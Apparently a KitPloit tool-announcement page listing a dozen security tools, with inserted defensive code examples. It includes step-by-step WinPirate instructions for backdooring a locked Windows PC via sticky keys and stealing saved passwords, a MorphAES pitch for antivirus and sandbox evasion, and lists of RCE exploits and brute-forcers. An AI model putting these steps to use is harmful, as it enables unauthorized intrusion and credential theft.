Channel: KitPloit - PenTest Tools!

WAS - Automatic USB Drive Malware Scanning Tool For The Security-Minded Person



Author: Fabio Baroni http://www.pentest.guru/ @Fabiothebest89
How many times have you plugged in a USB drive and double clicked on a file without scanning for malware? I guess, MANY.

Wait A Sec!
Even if you are a security guy, you'll often be in a hurry or absent-minded and you trust your USB drive (and so does your computer). What can possibly go wrong? Getting pwned is only a click away. You may have an antivirus with real-time protection, but if it doesn't have the signatures for a new virus it's very possible that the virus will go unnoticed, and even a heuristic scan may fail to detect it. Viruses are getting increasingly sophisticated.
Luckily there are services like Virus Total that allow you to scan a file with multiple antiviruses in order to increase the detection rate.
You may head over to the Virus Total website and upload all the files manually one by one, or you may use one of the scripts already available that check a file using the Virus Total API, but this tool is unique in its genre because it:
  • detects automatically the insertion of a new USB key
  • scans recursively all the files contained in the USB drive
  • hashes the files and checks them against the database of files already scanned by Virus Total
  • plays an audio message every time a new virus is detected
  • automatically displays a report in CSV format at the end of the scan
Note: although the core functions work in a cross-platform fashion, the automatic detection of a new USB key works only on Windows at the moment.
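The core of the workflow above (walk the drive, hash every file, look the hashes up, emit a CSV report) as an added example; this is not the tool's own code. The VirusTotal query is replaced by a local set of known-bad SHA-256 digests so the example runs offline, and the "drive" is a temporary directory populated with constructed sample files.

```python
import csv
import hashlib
import io
import os
import tempfile

# Constructed sample content; in the real tool the root would be the
# mount point of the freshly inserted USB drive.
SAMPLE_FILES = {
    "readme.txt": b"abc",
    "docs/empty.bin": b"",
    "bin/tool.exe": b"MZ\x90\x00constructed-sample-binary",
}

# Constructed stand-in for the "already scanned by Virus Total" lookup:
# a local set of SHA-256 digests that replaces the file-report API call.
KNOWN_BAD_SHA256 = {
    hashlib.sha256(SAMPLE_FILES["bin/tool.exe"]).hexdigest(),
}


def sha256_file(path, chunk_size=1 << 20):
    """Stream the file through SHA-256 so large files need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def hash_tree(root):
    """Recursively hash every regular file under root.

    Returns (relative_path, sha256_hex) tuples in a stable order. Symlinks are
    skipped so a crafted drive cannot point the scanner outside the mount point.
    """
    results = []
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        dirnames.sort()
        for name in sorted(filenames):
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            results.append((rel, sha256_file(full)))
    return results


def classify(hashes, known_bad):
    """Mark each hashed file 'infected' or 'clean' using the lookup set."""
    return [(rel, h, "infected" if h in known_bad else "clean") for rel, h in hashes]


def csv_report(rows):
    """Render the classification as the CSV text shown at the end of a scan."""
    buf = io.StringIO()
    writer = csv.writer(buf)
    writer.writerow(["path", "sha256", "verdict"])
    writer.writerows(rows)
    return buf.getvalue()


def scan_directory(root, known_bad=KNOWN_BAD_SHA256):
    """Hash, classify and report every file under root; returns (rows, csv_text)."""
    rows = classify(hash_tree(root), known_bad)
    return rows, csv_report(rows)


def build_sample_drive():
    """Materialise SAMPLE_FILES in a temp dir standing in for a mounted drive."""
    root = tempfile.mkdtemp(prefix="was-demo-")
    for rel, data in SAMPLE_FILES.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(data)
    return root


if __name__ == "__main__":
    _, report = scan_directory(build_sample_drive())
    print(report)
```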

USAGE
python was.py
As simple as that. This tool has been designed with the run and forget concept in mind.
Just keep it running. You don't need to execute it every time you want to use it.

CONFIG
This tool uses a configuration file ( was-config.ini ) that allows you to specify some settings:
  • api-key : Virus Total api key that is necessary for the program to work
  • lang : language to be used for the notifications (e.g. EN, IT)
  • sound : enables/disables audio notifications
  • lock : enables/disables file-locking for files that aren't scanned yet or prove to be infected. (function not yet implemented)

DEPENDENCIES
This tool requires Python 3.x to run and requires the following modules not included in the standard library:


TODO
  • add support for more languages
  • implement file-locking function
  • implement file upload function for scanning files not already scanned by Virus Total
  • create Windows binary for ease of use by Windows folks
  • add Linux support



Matroschka - Python Steganography Tool To Hide Images Or Text In Images



Матрёшка [mɐˈtrʲɵʂkə] is a command-line steganography tool written in pure Python. You can use it to hide and encrypt images or text in the least significant bits of pixels in an image.

Encryption
The encryption uses HMAC-SHA256 to authenticate the hidden data. The supplied MAC password is hashed with SHA-256 to generate the HMAC-SHA256 key. The MAC and the message data are then encrypted using the XTEA algorithm in CFB mode running 32 iterations, before being embedded in the image data. The SHA-256 hash for the XTEA key is created from the 128 high-order bits of the supplied password. A random 8-byte seed is used for the CFB 64-bit block cipher.

Decryption
The random seed is appended to the hidden secret and is used together with the user-supplied password to decrypt the hidden message with the XTEA block cipher, mirroring the encryption process. The decrypted secret is then authenticated by comparing the embedded HMAC with the HMAC-SHA256 of the extracted hidden message under the user-supplied MAC password.
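The scheme as described (HMAC-SHA256 over the message, tag and message encrypted with XTEA in 64-bit CFB mode for 32 rounds, random 8-byte seed appended) worked through in pure Python as an added example; this is not the project's own code. Assumptions: the HMAC key is SHA-256(mac password), the XTEA key is the first 16 bytes of SHA-256(password), XTEA words are big-endian, and the tag precedes the message inside the ciphertext. The decrypt side shows the check the description implies: refuse the secret when the tag does not verify, using a constant-time compare.

```python
import hashlib
import hmac
import os
import struct

ROUNDS = 32     # XTEA iterations, as stated in the description
BLOCK = 8       # XTEA is a 64-bit block cipher
MAC_LEN = 32    # HMAC-SHA256 digest length


def xtea_encrypt_block(key, block, rounds=ROUNDS):
    """Encrypt one 8-byte block with a 16-byte key (XTEA, big-endian words)."""
    v0, v1 = struct.unpack(">2L", block)
    k = struct.unpack(">4L", key)
    delta, mask, s = 0x9E3779B9, 0xFFFFFFFF, 0
    for _ in range(rounds):
        v0 = (v0 + ((((v1 << 4) ^ (v1 >> 5)) + v1) ^ (s + k[s & 3]))) & mask
        s = (s + delta) & mask
        v1 = (v1 + ((((v0 << 4) ^ (v0 >> 5)) + v0) ^ (s + k[(s >> 11) & 3]))) & mask
    return struct.pack(">2L", v0, v1)


def xtea_cfb(key, seed, data, encrypt):
    """CFB mode over 8-byte blocks; only the block encrypt function is needed.

    CFB is a stream construction, so a short final chunk needs no padding.
    """
    out = bytearray()
    feedback = seed
    for i in range(0, len(data), BLOCK):
        chunk = data[i:i + BLOCK]
        keystream = xtea_encrypt_block(key, feedback)
        block = bytes(a ^ b for a, b in zip(chunk, keystream))
        out += block
        feedback = block if encrypt else chunk   # ciphertext feeds the next block
    return bytes(out)


def derive_keys(mac_password, password):
    """HMAC key = SHA-256(mac password); XTEA key = first 128 bits of SHA-256(password).

    Assumption: the '128 high-order bits' of the description are the first 16
    bytes of the password's SHA-256 digest.
    """
    mac_key = hashlib.sha256(mac_password).digest()
    xtea_key = hashlib.sha256(password).digest()[:16]
    return mac_key, xtea_key


def seal(message, mac_password, password, seed=None):
    """Return ciphertext || seed, where ciphertext = CFB-XTEA(tag || message)."""
    mac_key, xtea_key = derive_keys(mac_password, password)
    tag = hmac.new(mac_key, message, hashlib.sha256).digest()
    seed = os.urandom(BLOCK) if seed is None else seed
    if len(seed) != BLOCK:
        raise ValueError("seed must be 8 bytes")
    return xtea_cfb(xtea_key, seed, tag + message, encrypt=True) + seed


def open_sealed(blob, mac_password, password):
    """Reverse seal(); raise ValueError when the HMAC does not verify."""
    if len(blob) < BLOCK + MAC_LEN:
        raise ValueError("blob too short")
    body, seed = blob[:-BLOCK], blob[-BLOCK:]
    mac_key, xtea_key = derive_keys(mac_password, password)
    plain = xtea_cfb(xtea_key, seed, body, encrypt=False)
    tag, message = plain[:MAC_LEN], plain[MAC_LEN:]
    expected = hmac.new(mac_key, message, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):   # constant-time comparison
        raise ValueError("authentication failed: wrong MAC password or tampered data")
    return message


def rejects(blob, mac_password, password):
    """True if open_sealed() refuses the blob (helper for checking failure cases)."""
    try:
        open_sealed(blob, mac_password, password)
    except ValueError:
        return True
    return False
```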

Note
This is a fun project. Do not use this for serious encryption purposes!

Installation
You may want to install Matroschka in a virtualenv that has Pillow installed. Clone the repo and navigate to the root dir. That's it.
pip install Pillow
git clone git@github.com:fgrimme/Matroschka.git
cd Matroschka

Usage
Only lossless image formats are supported. It is therefore recommended to use PNG or BMP images to hide your secret. The secret can be either a text file with the .txt extension or an image with the .png extension and format.
Note: If your image contains transparent pixels, artifacts will most likely be visible after embedding data. This is caused by the manipulation of the least significant bit in every pixel's color channels.
Hide Secret
python matroschka.py -hide -m <mac-password> -k <password> <secret> <image>
Reveal Secret
python matroschka.py -open -m <mac-password> -k <password> <image>
Example
matroschka_medium.png gets hidden and encrypted in matroschka_big.png
python matroschka.py -hide -m foo -k bar resources/matroschka_medium.png resources/matroschka_big.png
Decrypting the image will save the extracted image in resources/secret-image.png
python matroschka.py -open -m foo -k bar resources/matroschka_big.png


PowerUpSQL - A PowerShell Toolkit for Attacking SQL Server


The PowerUpSQL module includes functions that support SQL Server discovery, auditing for common weak configurations, and privilege escalation at scale. It is intended to be used during internal penetration tests and red team engagements. However, PowerUpSQL also includes many functions that could be used by administrators to quickly inventory the SQL Servers in their ADS domain.

PowerUpSQL was designed with six objectives in mind:
  • Easy Server Discovery: Discovery functions can be used to blindly identify local, domain, and non-domain SQL Server instances at scale.
  • Easy Server Auditing: The Invoke-SQLAudit function can be used to audit for common high impact vulnerabilities and weak configurations using the current login's privileges. Also, Invoke-SQLDumpInfo can be used to quickly inventory databases, privileges, and other information.
  • Easy Server Exploitation: The Invoke-SQLEscalatePriv function attempts to obtain sysadmin privileges using identified vulnerabilities.
  • Scalability: Multi-threading is supported on core functions so they can be executed against many SQL Servers quickly.
  • Flexibility: PowerUpSQL functions support the PowerShell pipeline so they can be used together, and with other scripts.
  • Portability: Default .NET libraries are used and there are no dependencies on SQLPS or the SMO libraries. Functions have also been designed so they can be run independently. As a result, it's easy to use on any Windows system with PowerShell v3 installed.

Module Information
  • Author: Scott Sutherland (@_nullbind), NetSPI - 2016
  • Contributors: Antti Rantasaari and Eric Gruber (@egru)
  • License: BSD 3-Clause
  • Required Dependencies: None
For setup instructions, function overviews, and common usage information check out the PowerUpSQL wiki: https://github.com/NetSPI/PowerUpSQL/wiki


MorphAES - IDPS & SandBox & AntiVirus STEALTH KILLER


MorphAES is the world's first polymorphic shellcode/malware engine, with metamorphic properties and capability to bypass sandboxes, which makes it undetectable for an IDPS, it's cross-platform as well and library-independent.

Properties:
  • Polymorphism (AES encryption)
  • Metamorphism (logic and constants changing)
  • Platform independent (Linux/BSD/Windows)
  • IDPS stealthing (the total number of possible signatures is more than the number of atoms in the universe for one given code)
  • Sandbox evasion (special assembly instructions)
  • Realism (no null bytes)
  • Can produce executables (malwares)
  • Input code can have arbitrary length
Dependencies for the morpher:
  • Python 2.7 - main engine
  • Python Crypto 2.6 - for encryption
Dependencies for the code execution:
  • 64-bit Intel AES-NI - for decryption
Nonetheless, there are some limitations (aka white-hat aspects):
  • Metamorphism is not very robust and can be detected using regular expressions (but can be improved pretty easily)
  • Unicode null bytes might still work (but who cares?)
  • It will only work on 64-bit Intel processors with AES-NI support, but since all the user's PCs (like Pentium, Celeron, i3, i5, i7) and the industry's servers (like Xeon) have it, it's more a specification than a limitation, thus a 32-bit implementation is impractical
  • Almost any shellcode is guaranteed to work; however, arbitrary code (malware) isn't
  • Windows/BSD PoC and executables are in progress...

How it works
  1. Shellcode padding with NOPs (since AES is a block cipher)
  2. Shellcode encryption with a random key using AES-128-ECB (not the best, but the simplest) - polymorphism
  3. Constants randomization, logic changes, instructions modification and rewriting - metamorphism

HowTo
For Linux:
sudo apt-get install python python-crypto
Execute the Python script and enter your shellcode, or nothing for a default Linux shell. You can specify your own execution address as well.
It is possible to build and execute on Windows/BSD/Mac as well, but I'm still testing it.
You can also use the Linux PoC in assembly:
as shellcode.s -o shellcode.o
ld shellcode.o -o shellcode
./shellcode
Every file is commented and explained

Tests
At this point it should be pretty obvious that the hashes would be different every time, but let's compare the ssdeep hashes of 2 Linux executables of the same shellcode:
  • 96:GztTHyKGQh3lo6Olv4W4zS/2WnDf74i4a4B7UEoB46keWJl09:Gzty6VOlvqSTDflmNroh,
  • 96:GQtT23yKmFUh3lo6OlOnIrFS4rkoPPf74i4a4B7UEoB46keWJ5:GQtCGWVOlOWFSsPflmNroh,
Well, there's something in common, but globally those are 2 different signatures; now what about the shellcode itself:
  • 48:eip2bR2LRNtRPORDGRopRBXR3cRzER2vRU9BnH6ksr:Srn+,
  • 48:6RjNeR2IRN7RPWRDeRokRB5R3xRz3R28RUxFT2+75eFK9iKMAdXAJKo:O9Tdwoo,
Almost totally different signatures for the same morphed shellcode!
At the publication date, the executable was detected as a shellcode by only 2 out of 53 antiviruses (AVG and Ikarus) on virustotal, but now it just fails to analyze.
malwr with cuckoo2 doesn't see anything suspicious.
From the reverser's perspective, IDA won't see anything either.
Radare2 would show the real instructions only if assembled by the assembler itself; however, it doesn't detect any crypto or suspicious activity for the executable.
Although I didn't test it personally, I think that FortiSandbox, Sophos Sandstorm, Blue Coat, GateWatcher and their derivatives might fail badly...

To put it in a nutshell
Basically, it can transform a script-kid's code (or a known one) into a zero-day.
IDPS will fail because it's almost impossible to make a signature and difficult to make a regular expression or heuristic analysis.
Most of the sandboxes don't use Intel's AES-NI instructions directly, so they will not execute the code, so "everything is fine" for them, whereas it's not.
The only way to defeat this type of shellcode/malware is to use appropriate sandboxing and/or an AI.
Notice that the whole execution is done in pure assembly; no Python (or shitty OpenSSL) is needed for the shellcode's/malware's execution since I use built-in assembly instructions only, thus it's system-independent (surely, you will have to assemble it for each one by adapting the instructions/opcodes, but they are still the same).

Notes
This is still a work in progress, I will implement Windows and BSD/Mac engines and PoCs ASAP.
IDPSes and sandboxes suck.
"Tradition becomes our security, and when the mind is secure it is in decay."
Jiddu Krishnamurti


WinPirate - Automated Sticky Keys Hack. Post Exploitation It Grabs Browser Passwords, History, And Network Passwords


Here's the plan. We create a way to automate doing the sticky keys windows hack from a bootable USB.
Then, we automate getting as many saved passwords as possible, drop a listener, and delete all traces that we were there.
All without being detected by antivirus
We should add a mimikittenz option if the computer was found running and unlocked; otherwise we can just run it later remotely.

How to Use
Requirements: a linux bootable USB, this repo on the USB (not in the OS, just put it in the root directory)
If the computer is locked:
1) shutdown windows (make sure not hibernating by holding shift while pressing shut down)
2) hit F12 and select USB
3) sudo -i
4) fdisk -l (note: if you're on Kali Linux, run parted -l)
5) mkdir /media/windows
6) mount /dev/WHATEVERTHEWINDOWSPARTITIONWASCALLED /media/windows -t ntfs
7) run Stickykeys.sh
8) restart and boot to Windows
9) hit Shift 5 times fast, a command prompt will appear
10) cd to the USB and run WinPirate.bat
If the computer isn't locked:
cd to the USB and run Run.bat (this will run WinPirate.bat silently in the background; it should be done in < 10 seconds)

Current Issues
1) The Chrome passwords grabber that I made is still a .py. For it to work, I need to convert it to an exe so it doesn't require Python to be installed on the system.
You can run it with python chromepasswords.py -csv and it will decrypt the Chrome saved passwords database and export it as a CSV.
2) The sticky keys automation doesn't speed the process up as much as I previously thought, as evidenced by the lengthy "How to Use" section.
3) I haven't been able to write any tools that grab passwords for IE or Firefox


SSH-Weak-DH - SSH Weak Diffie-Hellman Group Identification Tool


This tool establishes SSH connections to a server, enumerating various client configurations, in order to determine whether the server allows a Diffie-Hellman (DH) key exchange based on a weak group. We hope that our tool will be useful for checking SSH servers for weak DH key exchange configurations.


Installation

Requirements

This tool was tested under Ubuntu 14.04 and Mac OS X Yosemite. Although we have not tested our tool with other Linux distributions, its dependencies do not restrict its use to Ubuntu.
The setup script downloads, patches, and compiles a portable OpenSSH variant for Linux. For this process to succeed, you need to have the dependencies for compiling OpenSSH installed.
Other requirements include wget, tar, shasum, the patch tool, the bash shell, and Python 2.7 or later.
On a Debian-based system, use the following command to install dependencies:
sudo apt-get install coreutils build-essential automake patch libssl-dev python bash wget tar
Installing the aforementioned packages might already suffice to successfully build the patched OpenSSH client. If the client fails to build due to missing dependencies, use the following command to install all build dependencies:
sudo apt-get build-dep openssh

Command

On a Linux machine change to this directory and run:
chmod +x *.sh *.py
./setup.sh

Usage

Run ./ssh-weak-dh-test.sh hostname [port]. The results are printed on stdout. More detailed results can be found in the ssh-weak-dh directory under the subfolder whose name has the form hostname-port where hostname and port are the corresponding command line parameters.
The ssh-weak-dh-test.sh script calls the analysis script ssh-weak-dh-analyze.py to analyze the results stored in the aforementioned subfolder. Our analysis script is a standalone script and can be run on a results folder as follows:
./ssh-weak-dh-analyze.py ssh-weak-dh/localhost-22
The example above analyzes the results of the scan for the SSH server running on port 22 on localhost.
WARNING: This tool tests a limited number of configurations and therefore potentially fails to detect some weak configurations. Moreover, the server possibly blocks connections before the scan completes.

As for OpenSSH servers, https://weakdh.org/sysadmin.html provides configuration suggestions.
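The server-side counterpart to what the scanner probes, as an added example that is not part of the tool: audit an OpenSSH moduli file for group-exchange candidates below 2048 bits and an sshd_config for a fixed weak kex method. The moduli and sshd_config excerpts are constructed (the modulus column is placeholder hex, not real primes); note that the size field in moduli(5) is one less than the modulus bit length, so a 2048-bit group is listed as 2047.

```python
import re

# moduli(5) line layout: time type tests trials size generator modulus.
# "size" is the bit length minus one, so 2047 means a 2048-bit group.
MIN_SIZE_FIELD = 2047      # keep only groups of 2048 bits or more

# Constructed sample moduli file; modulus column is placeholder hex.
SAMPLE_MODULI = """\
# Time Type Tests Tries Size Generator Modulus
20120821044040 2 6 100 1023 2 DEADBEEFCAFE0001
20120821044041 2 6 100 1535 5 DEADBEEFCAFE0002
20120821044042 2 6 100 2047 2 DEADBEEFCAFE0003
20120821044043 2 6 100 4095 2 DEADBEEFCAFE0004
"""

# Constructed sshd_config excerpt with a fixed 1024-bit kex method still enabled.
SAMPLE_SSHD_CONFIG = """\
Port 22
KexAlgorithms curve25519-sha256@libssh.org,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256
Ciphers aes256-gcm@openssh.com
"""

# Kex methods that use a fixed group small enough to be considered weak.
WEAK_KEX = {
    "diffie-hellman-group1-sha1",   # Oakley group 2, 1024 bits
}


def _is_comment(line):
    return not line.strip() or line.lstrip().startswith("#")


def parse_moduli(text):
    """Yield (size_field, generator, line) for every non-comment moduli line."""
    for line in text.splitlines():
        if _is_comment(line):
            continue
        fields = line.split()
        if len(fields) != 7:
            raise ValueError("malformed moduli line: %r" % line)
        yield int(fields[4]), int(fields[5]), line


def weak_moduli(text, min_size=MIN_SIZE_FIELD):
    """Return the moduli lines whose size field is below min_size."""
    return [line for size, _, line in parse_moduli(text) if size < min_size]


def prune_moduli(text, min_size=MIN_SIZE_FIELD):
    """Return the file contents with weak groups dropped (comments preserved)."""
    kept = []
    for line in text.splitlines():
        if _is_comment(line) or int(line.split()[4]) >= min_size:
            kept.append(line)
    return "\n".join(kept) + "\n"


def weak_kex_in_config(config_text):
    """Return weak methods named in the effective KexAlgorithms directive.

    sshd honours the first occurrence of a directive, so later ones are ignored.
    """
    for line in config_text.splitlines():
        m = re.match(r"\s*KexAlgorithms\s+(\S+)", line, re.IGNORECASE)
        if m:
            return [a for a in m.group(1).split(",") if a in WEAK_KEX]
    return []


if __name__ == "__main__":
    for line in weak_moduli(SAMPLE_MODULI):
        print("weak group:", line)
    print("weak kex:", weak_kex_in_config(SAMPLE_SSHD_CONFIG))
```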


Faraday v2.1 - Collaborative Penetration Test and Vulnerability Management Platform

Faraday is the Integrated Multiuser Risk Environment you were looking for! It maps and leverages all the knowledge you generate in real time, letting you track and understand your audits. Our dashboard for CISOs and managers uncovers the impact and risk being assessed by the audit in real time without the need for a single email. Developed with a specialized set of functionalities that help users improve their own work, the main purpose is to re-use the available tools in the community, taking advantage of them in a collaborative way!

This sprint was mostly spent refactoring the Faraday Client, and it really paid off! Now it supports massive workspaces with over 200k hosts.


Larger workspaces are now supported

Changes




  • New plugin: WPscan
  • Major refactor of Faraday Client: now we support massive workspaces (200.000+ hosts)
  • Dashboard is now refreshed automatically every 60 seconds
  • Host Sidebar on GTK now adds information more intelligently and will never block the application 
  • Evidence screenshots in report generation are now bigger
  • Added a help menu to the GTK UI
  • Added a help section to the WEB UI



Help panel in the WEB UI

Bug fixes

  • Propecia plugin
  • 10+ minor bugs on the Web UI
  • Searches containing space character on Web UI
  • Updated URL shown when starting Faraday 
The next events where you can find Faraday:
(London) https://www.blackhat.com/eu-16/arsenal.html#faraday
(Buenos Aires) https://www.ekoparty.org
(Tokyo) http://en.avtokyo.org/avtokyo2016/event


We hope you enjoy it, and let us know if you have any questions or comments.

https://www.faradaysec.com
https://github.com/infobyte/faraday
https://twitter.com/faradaysec 
https://forum.faradaysec.com/

TestingWhiz - Codeless Software Testing Automation Tool


TestingWhiz is a test automation tool for web, database, cloud, mobile and web services/API testing from Cygnet Infotech. It has a codeless architecture based on the FAST Automation Engine with 290+ readily available test commands that provide an easy, intuitive and fast automation solution without requiring programming skills.

TestingWhiz comes with great features such as inbuilt scheduler, image comparison, distributed execution, captcha automation as well as multiple browsers and language support. Plus, it has out-of-the-box integrations with bug tracking tools - Jira, Mantis & FogBugz, test management tool – HP Quality Center, CI servers – Jenkins & Bamboo and Cloud execution platforms – BrowserStack and Sauce Labs.

It uses intelligent testing techniques such as Keyword-Driven Testing, Data-Driven Testing, Excel Inputs, Object Recorder and Java Scripting to help small, midsized and large-scale software companies as well as individual test engineers and QA analysts move to the next level of hassle-free test automation.

Features
  • FAST Automation Engine
  • Object Eye Record & Playback
  • Multiple Browsers Support
  • Continuous Server Integration
  • Integration with Atlassian JIRA, Mantis and FogBugz
  • Integration with HP Quality Center
  • Dynamic Test Data Support
  • Distributed Test Execution
  • Excel Integrations
  • In-built Scheduler
  • Image Comparison
  • Reports & Visual Logs
  • Captcha Automation
  • Risk-based Testing
  • Reusable Methods

Specifications

Application Rights: Commercial, Free Use, Periodic license, Trial
Tool Scope: Testing Tool
Testing Methods: Automatic Testing, Cloud Based Testing, Data Driven testing, Distributed testing, Functional testing, Keyword-driven testing, Regression testing, Traditional Testing
Testing Objectives: DB testing, Desktop testing, Object Based Testing, Mobile testing, Web testing, Cross-Browser testing
Operating Systems: Windows 10, Windows 8, Windows 7, Windows Vista, Windows XP
Hardware Requirements: 1 GB (2 GB Recommended), Hard Disk: 500MB
Scripting Language: Code Free, Visual Design (Scriptless)
Supported Technologies: Mobile Features, Android, Web, JavaScript, Windows GUI/Forms
Automation Tool Features: Analog View, Drag & Drop Editing, Execute with Scheduler, GUI Repository, Object Repository, Record & Playback, Test Data Tables
User Interface Available: GUI usability, Stand Alone application
System Integration support: ALM integration, Database integration, Defect Systems integration
Results Presentation: HTML Reports
Reporting Formats: HTML
Supported Browsers: Chrome, FireFox, IE, Safari
Defect Systems: Fogbugz, JIRA, Mantis


Getting Started
System Requirements
Operating System: Windows XP/ Windows Vista/ Windows 7/ Windows 8/ Windows 10
Processor: Intel Pentium 4 or later
RAM: 1 GB (2 GB Recommended)
Free Disk Space: 500 MB
Java Version: JRE 7 or later

Browser Support
Internet Explorer: Version 9, 10 and 11
Mozilla Firefox: Version 3.6 to version 39
Google Chrome: Version 36 to version 43
Edge: Version 25
Apple Safari: Version 5.x



BLACKBOx - A Penetration Testing Framework


Password Attacks:
  •     MD5 CRACKER
  •     SHA1 CRACKER
  •     SHA224 CRACKER
  •     SHA256 CRACKER
  •     SHA384 CRACKER
  •     SHA512 CRACKER
  •     MSSQL2000 CRACKER
  •     MSSQL2005 CRACKER
  •     MYSQL323 CRACKER
  •     MYSQL41 CRACKER
  •     ORACLE11 CRACKER

Web Hacking :
  •     Wordpress Bruteforce – Bruteforce wordpress panel
  •     FTP Bruteforce – Bruteforcing FTP LOGIN
  •     SSH Bruteforce – Bruteforcing SSH LOGIN
  •     Admin Page Finder – Find Admin Page
  •     Prestashop Exploit – PrestaShop Arbitrary file Upload (6 Modules)
  •     Dnsinfo – dns info via Yougetsignal & viewdns & hackertarget
  •     Magento Rce – Magento eCommerce - Remote Code Execution
  •     Joomla Rce – 1.5 - 3.4.5 remote code execution
  •     Google Dorker – google dorker (LFI SCANNER)
  •     Bing Dorker – bing dorker (LFI SCANNER )

Prerequisites:
sudo apt-get install python-passlib python-pexpect

Installation :
$ git clone https://darkeye@bitbucket.org/darkeye/blackbox.git && cd blackbox && chmod +x install && sudo ./install && cd


Version :
1.4v:
  •     Add Prestashop Exploit
  •     Add Admin Page finder
  •     Add FTP Bruteforcer
  •     Add SSH Bruteforcer
  •     Fix google dorker

1.5v:
  •     Fix LFI Scanner for google & bing dorker
  •     Fix some python error
  •     Fix Admin page finder
  •     Fix Hash cracker

1.6v:
  •     Fix Google Dorker
  •     Add MSSQL2000, MSSQL2005, MYSQL323, MYSQL41, ORACLE11 CRACKER

WSSAT - Web Service Security Assessment Tool


WSSAT is an open source web service security scanning tool which provides a dynamic environment to add, update or delete vulnerabilities by just editing its configuration files. This tool accepts a list of WSDL addresses as its input file and, for each service, performs both static and dynamic tests for the security vulnerabilities. It also performs information disclosure checks. With this tool, all web services can be analysed at once and the overall security assessment can be seen by the organization.

Objectives of WSSAT are to allow organizations:
  • Perform their web services security analysis at once
  • See overall security assessment with reports
  • Harden their web services
WSSAT’s main capabilities include:
Dynamic Testing:
  • Insecure Communication - SSL Not Used
  • Unauthenticated Service Method
  • Error Based SQL Injection
  • Cross Site Scripting
  • XML Bomb
  • External Entity Attack - XXE
  • XPATH Injection
  • Verbose SOAP Fault Message
Static Analysis:
  • Weak XML Schema: Unbounded Occurrences
  • Weak XML Schema: Undefined Namespace
  • Weak WS-SecurityPolicy: Insecure Transport
  • Weak WS-SecurityPolicy: Insufficient Supporting Token Protection
  • Weak WS-SecurityPolicy: Tokens Not Protected
Information Leakage:
  • Server or technology information disclosure
WSSAT’s main modules are:
  • Parser
  • Vulnerabilities Loader
  • Analyzer/Attacker
  • Logger
  • Report Generator
The main difference of WSSAT is that it creates a dynamic vulnerability management environment instead of embedding the vulnerabilities into the code.
This project has been developed as a term project at Middle East Technical University (METU), Software Management master's program.


Windows-Exploit-Suggester v3.2 - Compares a target's patch level against the Microsoft vulnerability database


This tool compares a target's patch level against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.

It requires the 'systeminfo' command output from a Windows host in order to compare it against the Microsoft security bulletin database and determine the patch level of the host.

It has the ability to automatically download the security bulletin database from Microsoft with the --update flag, and saves it as an Excel spreadsheet.

When looking at the command output, it is important to note that it assumes all vulnerabilities and then selectively removes them based upon the hotfix data. This can result in many false-positives, and it is key to know what software is actually running on the target host. For example, if there are known IIS exploits it will flag them even if IIS is not running on the target host.

The output shows either public exploits (E), or Metasploit modules (M) as indicated by the character value.

It was heavily inspired by Linux_Exploit_Suggester by Pentura.

USAGE
update the database
$ ./windows-exploit-suggester.py --update
[*] initiating...
[*] successfully requested base url
[*] scraped ms download url
[+] writing to file 2014-06-06-mssb.xlsx
[*] done
install dependencies
(install python-xlrd, $ pip install xlrd --upgrade)
feed it "systeminfo" input, and point it to the microsoft database
$ ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt 
[*] initiating...
[*] database file detected as xls or xlsx based on extension
[*] reading from the systeminfo input file
[*] querying database file for potential vulnerabilities
[*] comparing the 15 hotfix(es) against the 173 potential bulletins(s)
[*] there are now 168 remaining vulns
[+] windows version identified as 'Windows 7 SP1 32-bit'
[*]
[M] MS14-012: Cumulative Security Update for Internet Explorer (2925418) - Critical
[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important
[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
[M] MS13-080: Cumulative Security Update for Internet Explorer (2879017) - Critical
[M] MS13-069: Cumulative Security Update for Internet Explorer (2870699) - Critical
[M] MS13-059: Cumulative Security Update for Internet Explorer (2862772) - Critical
[M] MS13-055: Cumulative Security Update for Internet Explorer (2846071) - Critical
[M] MS13-053: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2850851) - Critical
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[*] done
possible exploits for an operating system can be used without hotfix data
$ ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --ostext 'windows server 2008 r2' 
[*] initiating...
[*] database file detected as xls or xlsx based on extension
[*] getting OS information from command line text
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 196 potential bulletins(s)
[*] there are now 196 remaining vulns
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical

LIMITATIONS

